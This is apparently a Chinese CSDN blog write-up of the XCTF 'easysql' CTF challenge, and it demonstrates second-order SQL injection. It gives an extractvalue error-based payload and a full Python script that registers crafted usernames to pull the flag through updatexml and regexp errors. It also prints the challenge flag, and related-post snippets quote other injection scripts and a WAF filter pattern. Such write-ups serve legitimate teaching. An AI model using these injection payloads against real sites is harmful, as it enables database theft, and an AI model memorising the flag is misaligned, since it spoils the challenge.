xctf攻防世界easysql wp

最新推荐文章于 2024-05-11 22:16:44 发布
最新推荐文章于 2024-05-11 22:16:44 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: CTF writeup 文章标签: 安全 sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/113878897
版权
CTF 同时被 2 个专栏收录
14 篇文章 1 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

xctf攻防世界easysql wp

在这里插入图片描述
考察知识点:

SQL注入
二次注入
python脚本

访问题目地址
在这里插入图片描述
有注册和登录两个功能
经测试发现该题目存在二次注入

https://www.jianshu.com/p/3fe7904683ac

username:'k3vin"/
password:k3vin
email:k3vin
注册成功后有一个修改密码的页面
修改密码,报如下错误
在这里插入图片描述
猜测并构造payload:

1"||extractvalue(1,concat(0x7e,(select(database()))))%23

直接上脚本:

import requests

url_reg = 'http://111.200.241.244:47230/register.php'
url_log = 'http://111.200.241.244:47230/login.php'
url_change = 'http://111.200.241.244:47230/changepwd.php'

pre = 'k3vin"'
#逆序闭合
suf = "')))),1))#"

#正序闭合
#suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
    data = {
        'username' : name,
        'password' : '123',
        'email' : '123',
    }
    r.post(url=url_reg, data=data)

def login(name):
    data = {
        'username' : name,
        'password' : '123',
    }
    r.post(url=url_log, data=data)
    
def changepwd():
    data = {
        'oldpass' : '',
        'newpass' : '',
    }
    kk = r.post(url=url_change, data=data)
    if 'XPATH' in kk.text:
        print(kk.text)

for i in s:
    #正序
    #paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    #逆序
    paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(paylaod)
    login(paylaod)
    changepwd()


#正序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "'))),1))#"
#逆序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "')))),1))#"

结果如下:
在这里插入图片描述
将此flag顺序逆过来就是最终的flag:
RCTF{sql_1njecti0n_is_f4n_6666}

sash1mi
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 381
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 ...在url中提交后便可访问页面源码,在...
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1534
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WPWP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
Web安全攻防世界08 very_easy_sql
weixin_42789937的博客
12-25 3171
Web安全攻防世界08 very_easy_sql,我也有点稀里糊涂,经过了多次失败,终于水了一篇混杂了30%的博文链接+60%的错误解法+文末10%官网wp的博文~
攻防世界-web-very_easy_sql
最新发布
MateSnake的博客
05-11 628
攻防世界-web-very_easy_sql
CTF每日练习之“ezsql“-regexp注入
LCW991207的博客
08-27 388
CTF每日练习(8月29日) "ezsql"-regexp注入
buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
m0_62094846的博客
05-18 622
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
XCTF2-web supersqli
orchid_sea的博客
11-28 539
使用 and 1=1判断注入点,存在单引号布尔注入。使用order by判断字段数,测试出来是2个字段。发现数据库supersqli,与题目对应。发现对 select|update|delete|drop|insert|where|./i都进行了正则匹配,存在两个表,words表和1919810931114514表,分别查看。words表中没有flag,数字表中存在flag字段。
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF攻防世界web新手练习_ 6_xff_referer
热门推荐
silence1_的博客
04-28 1万+
XCTF攻防世界web新手练习—disabled_button 题目 题目为xff_referer,描述信息 根据描述信息,知道题目应该与xff和referer相关 进入题目,看到 于是用brup抓包,在http头加一条X-Forwarded-For: 123.123.123.123 发送请求 在响应中看到必须来自谷歌 于是再次增加一条Referer: https://www.google.c...
[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli
末初的CSDN博客
11-07 1818
hint <?php //a "part" of the source code here function sqlWaf($s) { $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i'; if (preg_matc..
xctf攻防世界-web:view_source
weixin_46168073的博客
11-19 2216
一、首先解析题目。 已知查看网页源码有3种操作: 1.鼠标右键 2.F12 3.在url中提交view-source:http://111.200.241.244:58180 在线获取场景。 点击链接后进入。 可以看到鼠标右键是点击不了的。 二、做题 说实话,我们直接F12看不香嘛? 然后找到flag 复制进记事本,然后提交。 ...
[GYCTF2020]Ezsqli --BUUCTF
金 帛的博客
06-12 721
BUUCTF记录贴
[GYCTF2020]Ezsqli
Sk1y的博客
11-11 680
文章目录ASCII位偏移参考文章 无列名注入,acii位偏移 打开环境后,是个查询的东西 输入1 返回Nu1L 输入2 返回V&N 输入其他 返回Error Occured When Fetch Result. fuzz下,发现过滤了挺多的 import requests import time flag = "" url = 'http://2105be2a-2049-46f5-abfc-a6bf19dc2e59.node4.buuoj.cn:81/' #库名 #payload = "
[RCTF2015]EasySQL
m0_63253040的博客
07-22 842
反过来就是89-9b7f-46d3-acd4-732afd1243b7}显示没有这个字段,应该是前面没有把字段名字显示完全,用正则匹配。也不行,可能是二次注入,去重新注册一下。爆real_flag_1s_her字段。随便点一个发现url可能存在注入。使用reverse函数翻转字符串。进入环境,有一个注册和登录功能。假flag去users表看看。flag应该在后面用正则匹配。有报错了,我们使用报错注入。去登录注册看看能不能注入。发现在改密码的地方会报错。改密码123为1234。...
Rctf easysql 题解
一个码农的笔记
11-21 1770
这是一个二次注入,就是用户注册之后没有做检查直接将用户名带入数据库,改密码的时候将用户名完整带出,如果我们注册heheda\ 则在修改密码的时候数据库报错: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right synta
XCTF 攻防世界】WEB 高手进阶区 shrine(ssti,待补充)
weixin_45844670的博客
09-01 806
关于ssti的详解: (url先空着,正在写) 打开页面就是一段源码,右键查看下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config,猜测这就是flag, 如果没有过滤可以直接{{config}}即可查看所有app.config内容, 但是这题设了黑名单[‘config’,‘self’]并且过滤了括号 @app.route
攻防世界traffic
07-28
- *1* *2* [xctf攻防世界 Web高手进阶区 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值